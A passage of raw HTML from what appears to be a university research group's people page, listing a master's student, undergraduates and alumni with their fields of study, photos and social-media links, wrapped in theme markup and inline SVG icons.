52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-848-outer style-local-182-c134-outer\">\n            <div data-colibri-id=\"182-c134\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-848 style-local-182-c134 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c135\" class=\"d-block style-854 style-local-182-c135 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/10/cropped-1663377340901.jpg\" class=\"wp-image-1657 style-854-image style-local-182-c135-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-854-frameImage style-local-182-c135-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c136\" class=\"h-global-transition-all h-heading style-850 style-local-182-c136 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-850 style-local-182-c136\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Shah Md Shahnewaz Sayem</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c137\" class=\"h-text h-text-component style-851 style-local-182-c137 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Master\'s Student\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c138\" class=\"h-text h-text-component style-902 style-local-182-c138 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c139\" class=\"style-855 style-local-182-c139 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/shah-md-shahnewaz-sayem-767540154/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c143\" id=\"undergrads-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-828 style-local-182-c143 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c155\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-842 style-local-182-c155 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-843-outer style-local-182-c156-outer\">\n            <div data-colibri-id=\"182-c156\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-843 style-local-182-c156 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c157\" class=\"h-global-transition-all h-heading style-844 style-local-182-c157 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-844 style-local-182-c157\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Undergraduates</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c144\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-829 style-local-182-c144 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c145-outer\">\n            <div data-colibri-id=\"182-c145\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c145 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c146\" class=\"d-block style-831 style-local-182-c146 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c146-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c146-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c147\" class=\"h-global-transition-all h-heading style-832 style-local-182-c147 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c147\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Joshua Quiroz</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c148\" class=\"h-text h-text-component style-833 style-local-182-c148 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c149\" class=\"style-835 style-local-182-c149 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-830-outer style-local-182-c150-outer\">\n            <div data-colibri-id=\"182-c150\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-830 style-local-182-c150 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c151\" class=\"d-block style-831 style-local-182-c151 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2023/09/cropped-rn_image_picker_lib_temp_faf29ef5-64ad-4e05-bc96-2144c4d57790.jpg\" class=\"wp-image-1417 style-831-image style-local-182-c151-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-831-frameImage style-local-182-c151-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c152\" class=\"h-global-transition-all h-heading style-832 style-local-182-c152 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-832 style-local-182-c152\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Raiyan</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c153\" class=\"h-text h-text-component style-833 style-local-182-c153 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c154\" class=\"style-835 style-local-182-c154 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/joshua-quiroz-315713215/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n  <div data-colibri-component=\"section\" data-colibri-id=\"182-c158\" id=\"alumni\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-910 style-local-182-c158 position-relative\">\n    <!---->\n    <!---->\n    <div class=\"h-section-grid-container h-section-boxed-container\">\n      <div data-colibri-id=\"182-c209\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-924 style-local-182-c209 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-925-outer style-local-182-c210-outer\">\n            <div data-colibri-id=\"182-c210\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-925 style-local-182-c210 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c211\" class=\"h-global-transition-all h-heading style-926 style-local-182-c211 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-926 style-local-182-c211\">\n                    <!---->\n                    <!---->\n                    <h2 class=\"\">Alumni</h2>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"182-c159\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-911 style-local-182-c159 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c160-outer\">\n            <div data-colibri-id=\"182-c160\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c160 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c161\" class=\"d-block style-913 style-local-182-c161 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Sarah_Akinola-scaled-2.jpg\" class=\"wp-image-1595 style-913-image style-local-182-c161-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c161-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c162\" class=\"h-global-transition-all h-heading style-914 style-local-182-c162 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c162\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sarah Akinola</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c163\" class=\"h-text h-text-component style-915 style-local-182-c163 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c164\" class=\"style-917 style-local-182-c164 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/akinola-sarah-035789138\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c165-outer\">\n            <div data-colibri-id=\"182-c165\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c165 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c166\" class=\"d-block style-918 style-local-182-c166 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Anvith.jpg\" class=\"wp-image-1597 style-918-image style-local-182-c166-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-918-frameImage style-local-182-c166-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c167\" class=\"h-global-transition-all h-heading style-914 style-local-182-c167 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c167\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anvith Anand</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c168\" class=\"h-text h-text-component style-915 style-local-182-c168 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c169\" class=\"style-919 style-local-182-c169 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anvith-anand\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c170-outer\">\n            <div data-colibri-id=\"182-c170\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c170 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c171\" class=\"d-block style-920 style-local-182-c171 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Alex.jpg\" class=\"wp-image-884 style-920-image style-local-182-c171-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-920-frameImage style-local-182-c171-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c172\" class=\"h-global-transition-all h-heading style-914 style-local-182-c172 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c172\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Asige</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c173\" class=\"h-text h-text-component style-915 style-local-182-c173 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c174\" class=\"style-921 style-local-182-c174 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://twitter.com/i/flow/login?redirect_after_login=%2FAsigeAlex\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1347.656 445.313c0 11.719 0 26.367 0 38.086 0 407.227-310.547 875.977-875.977 875.977-172.852 0-336.914-49.805-471.68-137.695 23.438 2.93 49.805 2.93 73.242 2.93 143.555 0 278.32-46.875 383.789-131.836-134.766 0-249.023-90.82-290.039-213.867 20.508 5.859 38.086 5.859 58.594 5.859 29.297 0 55.664-2.93 82.031-8.789-140.625-29.297-246.094-155.273-246.094-301.758 0-2.93 0-2.93 0-5.859 41.016 23.438 87.891 38.086 137.695 38.086-82.031-52.734-137.695-149.414-137.695-254.883 0-55.664 17.578-108.398 43.945-155.273 149.414 187.5 377.93 310.547 632.813 322.266-5.859-23.438-8.789-46.875-8.789-70.313 0-169.922 137.695-307.617 307.617-307.617 90.82 0 169.922 38.086 225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      